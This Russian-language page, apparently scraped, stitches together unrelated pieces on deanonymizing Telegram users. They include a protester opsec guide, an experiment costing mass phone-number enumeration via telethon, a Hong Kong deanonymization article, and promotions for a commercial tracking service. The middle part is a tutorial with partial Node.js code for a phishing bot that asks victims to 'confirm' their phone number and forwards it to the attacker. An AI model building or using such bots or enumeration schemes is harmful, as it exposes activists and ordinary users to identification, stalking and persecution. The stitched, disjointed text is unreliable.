Как сделать деанон телеграм
0. Принципы работы Telegram
Когда ты регистрируешься там, то твоему аккаунту присваивается уникальный ID, привязанный к номеру телефона. Совершая любое действие, ты его палишь. Твой ID при этом можно получить и сохранить. Например, когда ты пишешь кому-то, то Telegram передает такие чувствительные данные:
Итог: Telegram всегда позволяет получить ID любого человека, к которому ты получил непосредственный доступ. То есть, ID любого члена чата, любого собеседника и любого пользователя бота, если ты администратор бота. ID привязан к аккаунту и изменить его нельзя, не меняя аккаунт.
О том, как работает API Telegram можно почитать вот здесь.
1. Способы деанона и как с ними бороться
А. По информации из открытых чатов
Мусора уже 100 лет как парсят все открытые чаты. Каждое твое неаккуратное слово бережно записано сотрудниками вместе с твоим ID. Они мониторят чаты очень давно, с самой зари телеграм. А еще чаты сейчас удобно локализованы по дворам и районам, что упрощает поиск пользователей. Многие на заре революционных событий августа-декабря оставили о себе там кучу инфы.
Б. По истории аккаунта
Как бороться: удалите старый аккаунт и создайте новый на виртуальный номер.
В. Закрытые чаты и личные переписки
Часто люди совершают две ошибки: не чистят чаты и сохраненные (мета-)данные Telegram, а также добавляют людей в контакты. Это значит, что завладев аккаунтом пользователя, часто можно раскрыть целую сеть его контактов из числа пользователей закрытых чатов. А если вы не очищаете базу данных и кэш телеграм, то в большинстве случаев удаленные переписки можно восстановить.
Как бороться: не добавляйте людей в контакты. Каждый день перед сном чистите историю всех чатов, а диалоги с ботами удаляйте совсем. Также полностью очищайте кэш и базы данных телеграм. Для лучшей безопасности установите для всех чатов таймер на удаление в 1 день. Старайтесь для личного общения пользоваться секретными чатами с таймером удаления в максимум час.
Г. P2P-звонки
Как бороться: отключить P2P-звонки в настройках Telegram и выходить в сеть через VPN-TOR.
Д. Социальная инженерия и всякий развод
Как бороться: быть внимательным и думать дважды прежде, чем на что-то нажать или выдать кому-то типа-знакомому важную информацию. Думать о том, зачем и с какой целью у вас о чем-то интересуются. Выходить в сеть через VPN-TOR, чтобы не допустить слива IP.
Е. Информация из смартфона
Очень часто люди зачем-то хранят данные из телеграм-чатов, которые позволяют сдеанонить пользователей, у себя в телефонах. Это и скрины чатов и картинки из них и что угодно.
Как бороться: не храните у себя в телефоне вообще никакого палева. Если вас будут пытать, то вы уверены, что готовы играть в советского героя-разведчика? Удаляйте все и проверяйте, чтобы у вас в телефоне не было никакой палевной инфы. Все важное храните в облаке, доступ к которому имеют заграничные друзья. Все неважное просто удаляйте. Кроме того, зашифруйте
Ж. Тайминг-атака
Она бывает двух типов. Либо сопоставляется время онлайна пользователя с временем соединения с сетью, либо куда-то вкидывается файл определенного размера и отслеживается кто его скачал. Это работает, если ваш онлайн и время подключения совпадают и если ваш клиент автоматически подгружает файлы. Например: вы входите в ТОР и менты знают, что вы им пользовались, т.к. слили ваш IP. Они смотрят кто и когда подключался к ТОР в определенное время, например, с 12:10 до 12:45. Потом записывают все IP, с которых это сделано. Так со многими временными промежутками и опа вы установлены.
Как бороться: не входите в мессенджеры или соцсети сразу после подключения к сети или VPN-TOR. Также можно входить в TOR из-под VPN. В настройках телеграм отключите показ времени вашей активности, а также автозагрузку файлов и вообще не загружайте все файлы подряд.
Суть проста: вам предлагают уйти либо для общения, либо для чего-то ещё на сторонний ресурс, который является приманкой и сливает все ваши данные. Или вам, опять же, предлагают куда-то срочно кликнуть, чтобы себя обезопасить.
Как бороться: не уходить из телеграм на сторонние ресурсы, если вы не уверены в том, кто это предлагает, а если уверены, то уточнять зачем это нужно. Кроме этого не кликайте абы-на какие ссылки в чатах и ЛС.
И. Фишинг со взломанного устройства
Схема такая: берут человека, получают доступ к его устройствам, а потом пишут его контактам или тем с кем были диалоги, выведывая личную инфу.
Как бороться: если человек вас знает, то личная инфа ему не нужна, а если не знает, но пишет с чужого аккаунта, то он мент. Не давайте лишней личной инфы знакомым людям в личной переписке, особенно если они спрашивают внезапно.
К. Фишинг с зараженными файлами
Л. Фишинг с фейковыми ботами
Как бороться: перепроверяйте оригинальность написания имени бота. Не ищите их через поиск, а переходите на них только из официальных ресурсов штабов или организаций.
М. Слив данных через веб-камеру и прочие устройства компьютера
Суть в том, чтобы увести на сайт, который запросит у вас доступ, например, к веб-камере, а потом сольет ваше фото. Или запросит доступ к звуку и будет слушать вас.
Как бороться: не переходить по левым ссылкам из телеграм, а также не давать доступ к устройствам. Веб-камеру лучше заклеить непрозрачным скотчем.
Н. Атака со звездочкой по отпечаткам браузера и Cookies
Неизвестно, реализовалась ли эта атака на практике, но она вполне возможна. Суть её такая: вам скидывают ссылку на сайт какого-то госа. Либо её скидывают в чат. Люди переходят на него, а сайт сливает Cookies или отпечатки браузера. Суть в том, что эти данные хранятся в браузере на вашей стороне и браузер каждый раз отправляет старые данные, даже если вы вошли через VPN. То есть, если вы когда-то заходили на сайт и не чистили кэш браузера, то он отдаст сайту ваши настоящие Cookies с вашим РБшным IP.
Как бороться: постоянно чистить кэш браузера, например, с помощью Ccleaner. Переходить по ссылкам копируя их в ТОР-браузер. По всяким стремным ссылкам не ходить вообще.
О. Атака со звездочкой с созданием левого ресурса
П. Сложная социальная инженерия
Как бороться: не доверяйте никому, проверяйте людей десять раз, особенно если они претендуют на лидерство или важные функции в группе. Не бойтесь выразить своё недоверие вслух и потребовать дополнительную проверку человека потому что это вопрос жизни и смерти.
Р. Комбинированные атаки
Это микс из любых приведенных выше атак. Обычно он применяется если нужно установить какого-то конкретного человека.
Как бороться: все вышеприведенные правила.
С. Терморектальный ака Бандитский криптоанализ
Суть его в следующем: тебя ловят и пытают до тех пор, пока ты не дашь нужную информацию или не подпишешь то, что тебе подсовывают. Этот метод в связи со своей беспомощностью всё чаще используют слабовики в РБ. То есть, они туповаты, поэтому заниматься оперативно-розыскной деятельностью им влом, а для того чтобы взять рандомного чела и пытать его пока он все не подпишет, мозгов не надо. Также под пытками он может кого-то сдать.
2. Что почитать, чтобы поумнеть?
3. Выводы
Никакой Дуров не защитит тебя за тебя самого. Чтобы надежно защитить себя, ты просто обязан постоянно изучать то, как работают технологии, как деанонят людей и как защититься от этого. Иначе ты будешь заложником советчиков из интернета, делать все машинально и без понимания сути и рано или поздно 100% проколешься. Будь на чеку, думай головой и не жалей времени на то, чтобы псы режима потратили на то, чтобы тебя найти, много денег и сил.
Плохая новость в том, что если ищут именно тебя, то скорее всего найдут и это показало дело Дедка. Но поверь, что если бы всех было также сложно искать, то ГУБОП бы просто разошелся по швам.
tl;dr: исследую возможности для сопоставления аккаунтов с номерами телефонов в российском сегменте Телеграма.
В мире много людей, которые хотят получить возможность сдеанонить произвольного пользователя. Это могут быть капиталисты не гнушающиеся спама, спецслужбы, мошенники и просто сталкеры. Социальные сервисы пытаются лавировать между желанием привлечь как можно большую аудиторию через импорт контактов и лимитами на доступ к подобной информации. Лавируют по-разному, одни позиционируют себя максимально социальными, другие же больше ценят прайваси. Вторые становятся объектами нападок со стороны сторонников максимальной приватности.
По умолчанию в Telegram, как и в менее приватных мессенджерах, можно добыть аккаунт пользователя, зная его номер. При этом, владелец номера может ограничить эту возможность только для взаимных контактов, для этого есть специальная опция. По умолчанию она выключена, а значит у нас есть полный Telegram беспечных и сознательно публичных ребят. Функция появилась, кажется, из-за слива базы пользователей. Я решил разобраться, во сколько обойдётся создание аналогичной базы, и смогу ли я создать такую.
Я ограничил интересы только российскими пользователями. База номерных диапазонов, как оказалось, публикуется Россвязью, что дополнительно упростило мне задачу, избавив от необходимости скрейпить сайты с подобной информацией. Всего операторам на седьмое сентября раздали почти шестьсот миллионов номеров, а точнее, ровно 598035003.
Я взял несколько сим-карт, `telethon` (Python-модуль с полноценной реализацией MTProto) и попробовал создать такую базу у себя.
Расшаривание контактов и добавление в группу
Помните историю про гонконгский деанон? Бот добавлял пользователей в группу по номеру телефона, тем самым получал аккаунт, привязанный к телефону. В этой же статье журналист ZDNet связался с представителем Telegram. Последний заявил что массовый импорт будет сопряжён с проблемами.
We have suspected that some government-sponsored attackers have exploited this bug and use it to target Hong Kong protesters, in some cases posting immediate dangers to the life of the protestors
Поэтому я решил сначала пошарить контакты. Интерфейс официальных Telegram-клиентов позволяет расшаривать только тех пользователей, чей номер вам так или иначе видно. Однако, `telethon` позволяет расшаривать контакты с произвольным номером. Судя по его API, функция расшаривания — это отправка файла определённого типа. Для предварительной проверки я набросал скрипт, который без лишних вопросов отправил указанный контакт моему основному аккаунту.
Для проверки скриптом, я завёл «чистый» аккаунт (далее Бот), и отправил в ещё один аккаунт (далее Получатель) три номера: Паши, Даши и свой. У всех есть Telegram. Паша расшарил свой телефон вообще всем. Даша добавила в контакты Получателя. Свой номер я добавил дважды: сначала добавив Бота к себе в контакты, потом удалил у себя бота и добавил себя в контакты Боту.
Результат можно интерпретировать по картинке: нормально контакты шарятся исключительно при условии доступности телефона боту. С добавлением в чат всё ещё хуже. Я не могу добавить Ботом даже аккаунты с известным Боту телефоном, если они выключили эту возможность в настройках. Кроме того, Бота могут быстро забанить, если пользователи начнут сообщать о спаме. Так я никого не сдеаноню, самое время забыть об этой идее.
Синхронизация
Синхронизация контактов, как я уже сказал, потенциально влечёт к ограничениям для аккаунта. Но как это выглядит? Я написал ещё один скрипт, забирающий из базы случайные номера и добавляющий их в контакты. После этого скрипт парсит контакты, идентификаторы найденых в ростере аккаунтов добавляет обратно в базу, остальных отмечает нулями и удаляет контакты из ростера.
Затем я прогнал 5000 рандомных номеров, по слухам, именно такие лимиты работают в Telegram. В выводе не нашёл ни одного идентификатора, кроме самого Бота. Теперь, чтобы исключить возможные ошибки в коде и обманку Телеграма, добавляю к рандомным номерам вручную номер Даши, отключаю удаление контактов из ростера, уменьшаю объём выборки до 3000 номеров и прогоняю снова. Даши нет ни в ростере, ни в базе. Попытка вручную добавить Дашу намекает, что сработали лимиты Телеграма.
Вроде почти всё хорошо. Чтобы убедиться, я удалил аккаунт и зарегистрировал его заново, уменьшил количество телефонов до 3000 включая Дашу и прогнал скрипт ещё раз. Результат аналогичный. Похоже, что лимиты затрагивают не аккаунт, а номер телефона, с которого синхронизируются контакты. Кажется, всё хорошо, и телеграм действительно обеспечивает разумный уровень защиты от перебора.
Или нет?
В интернете упоминается как минимум два сервиса, которые, якобы просканировали широкий диапазон номеров. Один из них я проверил, работает плохо. Предположим, второй не врёт и им это действительно удалось. Давайте даже предположим, что им не нужно обрабатывать все 600 миллионов номеров и они откуда-то знают 150 миллионов реально активных номеров (чуть больше, чем по одному номеру на душу населения РФ). Сколько будет стоить просканировать всех за полгода, соблюдая все ограничения мессенджера? А за три месяца? А за месяц? А за один день?
Допустим, с одного номера можно сосканировать 5000 контактов в первый день и ещё 100 в каждый последующий. За полгода с каждого номера можно перебрать 23000 контактов (180*100+5000) , для перебора понадобится около 6500 номеров (150000000/23000) . Не так уж много, правда? Если каждая симка обойдётся в 150 рублей (а это дорого!), то расходы на их приобретение составят менее миллиона рублей. Подъёмная сумма даже для малого бизнеса! Для SIM-карт даже много оборудования держать не нужно, залогинился и запускаешь скрипт раз в день.
Но давайте пересчитаем по максимуму. Возьмём весь пул в 600 миллионов номеров и сократим сроки до месяца. Получится, что нужно 75 тысяч SIM-карт, которые обойдутся всего где-то в десять раз дороже (600000000/(5000+30*100)*150=11250000) . Придётся постараться найти столько симок, зато можно сократить их стоимость в такой партии. Потенциально можно использовать сервисы, которые позволяют регистрировать аккаунт от 3.5 рублей за штуку, а самые отбитые могут распространять трояны, чтобы крали SMS. Тогда это будет стоить сильно дешевле. Разработка не кажется сверхсложной, хостинг клиентов также не должен стать большой проблемой. Возможно, придётся использовать множество прокси, но это не точно.
Мне не удалось собрать базу из-за лимитов Telegram и это хорошо. Значит, есть некоторый порог входа для таких действий. Бесполезные скрипты я сложил в гит. Но нет ничего крайне сложного сделать это при наличии некоторых ресурсов. Особенно, если ограничить интересы конкретными регионами, например, в Еврейской АО меньше миллиона номеров в пуле, а в Башкортостане 12.5 миллионов.
Я предложил команде Телеграма информировать пользователя о возможности скрыть телефон. А вам напоминаю, что анонимность в социальных сервисах условна. Если вам не хочется попасть под массовый деанон, скройте свой номер телефона в Telegram для всех, кроме ваших контактов.
В 2019 году в Гонконге вспыхнули массовые протесты, вызванные законом об экстрадиции, дающим правительству Гонконга право передавать своих граждан по запросам стран, с которыми не подписано соглашение об экстрадиции. Как бы это странно ни звучало, но такого соглашения нет, в частности, с материковым Китаем.
Жители Гонконга увидели в принимаемом законе угрозу автономии региона и нарушение прав граждан, что послужило поводом к серии массовых протестов. Интернет полон эпичных видеороликов и фотографий, запечатлевших описываемые события. Спустя некоторое время протестующие расширили список своих требований, и на начало 2020 года протесты продолжали бушевать.
Для координации действий использовался мессенджер Telegram. Выбор был сделан из-за позиционируемого упора на приватность данных, а также из-за возможности создавать большие чаты и группы. Именно в этих чатах и группах планировались акции и обсуждались противоправные, с точки зрения властей, действия.
Однако нас интересуют не сами протесты, не их причина, а заявления протестующих о возможности властей независимо от настроек конфиденциальности получать данные о мобильном номере, привязанном к аккаунту Telegram. Я уже писал в рамках курса об уязвимости, позволяющей, добавляя все подряд телефонные номера, получать в результате логины пользователей, связанные с ними.
Безусловно, не все привязывают личную сим-карту к Telegram. Предположим, диссидент, которого хотят вычислить, купил сим-карту в переходе и никогда не оформлял ее на себя. Как можно установить его личность?
Первый путь – установить, где происходила активация сим-карты и с какого устройства. У каждого мобильного устройства есть IMEI – уникальный идентификатор, и при активации сим-карты он передается оператору. По IMEI можно узнать, какие еще сим-карты вставлялись в устройство. Немногие, даже самые рьяные, поборники анонимности сразу после активации отправляют телефон в мусорное ведро.
Даже если жертва вставляла сим-карту не у себя дома, будет проверено, какие мобильные устройства были поблизости в момент активации. Если в это время в кармане лежал включенный личный мобильный телефон или он был выключен в том же месте незадолго до активации анонимной сим-карты, это провал.
Второй путь – биллинг, а именно изучить, каким образом пополнялась купленная сим-карта, какие СМС приходили на нее. Возможно, она пополнялась через уличный терминал, размещенный под камерами, и в этот момент у пополнявшего был включен личный мобильный телефон, либо она пополнялась с личного электронного кошелька, что еще лучше для установления личности.
Если речь идет об арендуемом виртуальном номере, то предоставляющие их сервисы, вопреки заблуждениям, весьма охотно выдают всю информацию. Последние годы на них оказывается серьезное давление, вплоть до угроз выведения из строя инфраструктуры. Мне доводилось общаться с одним из владельцев. В стоимость номера он не закладывает работу с жалобами, иначе цена возросла бы в десятки раз, а потому сервис выдает все имеющиеся данные по запросу правоохранительных органов любой страны.
Они зарабатывают, предлагая сэкономить на международных звонках, а аренда номера для разового приема СМС – это, можно сказать, работа в убыток. Хотя, если у вас есть надежный сервис, куда вы зайдете через Tor, укажете одноразовую почту и где рассчитаетесь биткоинами, ‒ это хороший вариант.
Но вернемся к протестам и Telegram. Когда тема деанонимизации пользователей получила общественный резонанс, руководство Telegram добавило новую настройку конфиденциальности «Кто может найти меня по номеру», где одним из пунктов был предложен вариант «Никто».
Руководство Telegram ответило новой возможностью указать «Никто» в опции «Кто видит мой номер телефона». Гениальное решение, способное решить все проблемы пробива мобильных номеров, но не тут-то было. Опция «Никто» в ее первой реализации – это обман пользователей со стороны Telegram. Она по-прежнему позволяла получать данные об аккаунте Telegram всем, у кого привязанный к этому аккаунту номер телефона добавлен в список контактов. Да, вы все правильно прочитали: это была просто пыль в глаза.
Доказательства можете изучить по этой ссылке, я бы не стал обманывать вас.
Многих в тот момент шокировала эта новость. Указанный в Telegram номер по-прежнему могли получить без проблем и спецслужбы, и злоумышленники.
Чуть позже Telegram ужесточил настройки, позволив находить по номеру телефона только тех, кто добавлен на целевом устройстве в список контактов. У меня есть достаточно достоверная информация, что это серьезно осложнило работу пробива актуального номера. Подавляющее количество сервисов, предлагавших такого рода услуги, работают с базами, собранными в начале осени 2019 года.
Хочу обратить ваше внимание: недостаточно сменить номер мобильного и username или даже совсем его не использовать. Каждый аккаунт Telegram имеет постоянный User ID, сменить который пользователь не имеет возможности. Многие базы данных уже содержат User ID, что позволяет получить историю мобильных номеров, привязывавшихся к аккаунту ранее, и использованных ранее username.
Потому у спецслужб всегда будет возможность получить данные о прежних номерах телефона, привязанных к конкретному User ID, и проверить каждый из них. User ID меняется только при полной смене аккаунта. Рекомендую удалить текущий аккаунт и зарегистрировать новый, если вам важна максимальная анонимность.
Вот еще один важный момент: некоторые пользователи не сразу после регистрации аккаунта активируют настройки приватности. Уже спустя час после регистрации аккаунта ваши данные могут оказаться в подобных базах и дальнейшие меры будут малоэффективны. Потому настроить безопасность спустя время после регистрации лучше, чем не настроить совсем, но недостаточно, если вы серьезно заботитесь о своей анонимности.
Безопасность необходимо настраивать максимально быстро после регистрации аккаунта.
Что стоит сделать Первым делом запретите Telegram доступ к контактам, это можно сделать в настройках вашего устройства. Например, в iOS это выглядит так.
В настройках управления данными удалите импортированные контакты и отключите синхронизацию контактов. Вы, наверное, слышали этот совет миллион раз.
В настройках конфиденциальности > номер телефона запретите кому-либо видеть ваш номер телефона, а искать по номеру телефона разрешите только тем, кто добавлен у вас в контакты.
Ну, а если базовых рекомендаций вам мало, покупайте новое устройство, регистрируйте новый аккаунт в магазине приложений Google/Apple. Затем ищите сервис аренды виртуальных номеров, где будет возможно оплатить при помощи биткоинов и зарегистрироваться с Tor, арендуйте там виртуальный номер, на который зарегистрируйте новый аккаунт Telegram.
Подготовка:
Для начала необходимо установить Node.js.
LOCKNET
При установке оставляем все по дефолту и перезагружаем компьютер.
После установки Node.Js и перезагрузки компьютера создаем папку с проектом в папке с Node.Js, а также создаем файл index.js уже в папке именно проекта
LOCKNET
Открываем Node.Js command prompt, заходим в папку с нашим ботом, и после прописываем следующие команды:
После установки структура файлов будет выглядеть так:
LOCKNET LOCKNET
Получаем Токен:
Начинаем прогать:
2. Создаем переменную TOKEN - которая будет хранить Токен бота:
3. И создаем самого бота для дальнейших действий:
const bot = new TelegramBot(TOKEN, );
Первое значение - это Токен, второе это настройки, но лучше оставить так как я написал
4. Теперь давайте сделаем чтобы на текст /start бот просил якобы "Подтвердить номер телефона":
Для того чтобы скрипт запустился, необходимо запустить Node.js command prompt, командами cd перейти в нашу папку и написать:
После написания команды, выскочит предупреждение, но оно вылазит всегда
P.S: После каждого обновления скрипта необходимо перезапускать бота в Node.Js command prompt
LOCKNET
Теперь пишем боту:
LOCKNET
Как видите он и правда отвечает, теперь сделаем красивую клавиатуру, и чтобы после ее нажатия злоумышленнику (То есть нам) приходил контакт собеседника:
console.log(id); // Нам надо также запомнить chat_id с нами, это потребуется в будующем
text: "Подтвердить телефон", // Текст который будет на клавиатуре
request_contact: true // Будем ли мы запрашивать контакт
Перезапускаем наш скрипт:
И действительно, теперь юзер отправляет боту свой номер телефона по кнопке, осталось сделать чтобы он пересылался нам (Злоумышленнику)
LOCKNET
Теперь также мы знаем Chat ID "админа" (То есть нас) - Куда бот будет отправлять контакт
Остался последний шаг, проводим корректировки:
bot.sendMessage(admin, "Телефонный номер:" + msg.contact.phone_number);
Практика:
Вот как видит жертва:
LOCKNET
А вот что получаем мы:
LOCKNET
Ссылки:
Полный код бота доступен в репозитории на Github.
Источник: @mitchel_ed
ВАЖНЫЕ ССЫЛКИ:
Мой второй канал LOCKNET | MONEY - ТЫК
Обучающий канал LOCKNET | Обучение - ТЫК
Предыдущие статьи:
Телеграм-Деанонимайзер запись закреплена
Телеграм-Деанонимайзер запись закреплена
Игорь Бедеров
1 декабря в Москве пройдет конференция КРЭБ (Конкурентная разведка & Экономическая безопасность), на которой будет обсуждаться как эффективно обеспечить корпоративную безопасность в 2022 году.
На КРЭБе также обсудят корпоративную безопасность с учетом человеческого фактора, противодействие внешним угрозам, мошенничеству и коррупции, а также проведут круглый стол с представителями клубов безопасности. Участвовать можно офлайн и онлайн.
Телеграм-Деанонимайзер запись закреплена
Телеграм-Деанонимайзер запись закреплена
Telegram Nearby Map - выгрузка данных о пользователях Telegram по данным геолокации.
З.Ы. решили, наконец, развить старую идею в графической форме и с привязкой к реальной карте. В тексте работает и тут @TgAnalyst_bot
Телеграм-Деанонимайзер запись закреплена
Игорь Бедеров
А ты поддержал безопасность молодежи?
Телеграм-Деанонимайзер запись закреплена
Демонстрируем возможность получения фингерпринтов пользователя Telegram при помощи сервиса Телеграм-Деанонимайзер, разработанного компанией Интернет-Розыск. Визуализация данных собственная.Телеграм-Деанонимайзер запись закреплена
Демонстрируем возможность отслеживания перемещений пользователя Telegram при помощи сервиса Телеграм-Деанонимайзер, разработанного компанией Интернет-Розыск. Визуализация данных при помощи Google Maps.Телеграм-Деанонимайзер запись закреплена
Игорь Бедеров
О безопасности связи пост.
Отмечу другое. Действительно, вопрос идентификации пользователей мессенджеров стоит перед полицией. Уже набили оскомину многочисленные колумбайнерские каналы в Telegram, торговля через него наркотиками, существование в нем суицидальных сообществ и многое другое. Я говорю это, как человек, сделавший второй в истории продукт, предназначенный для проведения расследований в Telegram - Телеграм-Деанонимайзер.
Но, предлагаемые Правительством правила, вероятно, не смогут дать ожидаемого результата. И вот почему:
1. Несмотря на требование об обязательной идентификации владельцев симкарт в России, это не сделано до сих пор. По прежнему, симкарту можно купить у метро, на развалах и лотках, заказать через интернет. И сделать это можно без указания своих паспортных данных.
2. Существует сложность идентификации владельцев т.н. "виртуальных" симкарт. Последние можно оформить на многочисленных сайтах в сети интернет, после чего привязать к мессенджеру и использовать его с достаточной степенью анонимности.
3. Существует большое число мессенджеров, которые не используют номер телефона или адрес электронной почты в качестве средства идентификации пользователя. Они вообще никак не идентифицируют своих пользователей.
4. В стране отсутствует система криминалистического учета и идентификации пользователей сети интернет по электронно-цифровому следу. А именно это могло было стать "дактилоскопией" XXI века - простым и надежным выходом из положения.
Давайте приведем пример из, всеми любимого, Telegram. Он на слайде. У нас есть аккаунт в мессенджере, привязанный к британскому номеру телефона. И у нас есть электронно-цифровой след этого аккаунта, который говорит о том, что фактически владелец аккаунта находится в Москве, в сети Ростелекома. Что изменят для такого пользователя новые правила Правительства РФ?
Читайте также:
- Найдите в предложениях приложения вставьте пропущенные дефисы он искал телефон автомат
- Как подать заявку в школу через сайт госуслуги в мобильном приложении
- Бот для создания презентаций телеграм
- Приложение файлы на андроид стало на английском
- Дія приложение скачать для андроид бесплатно без регистрации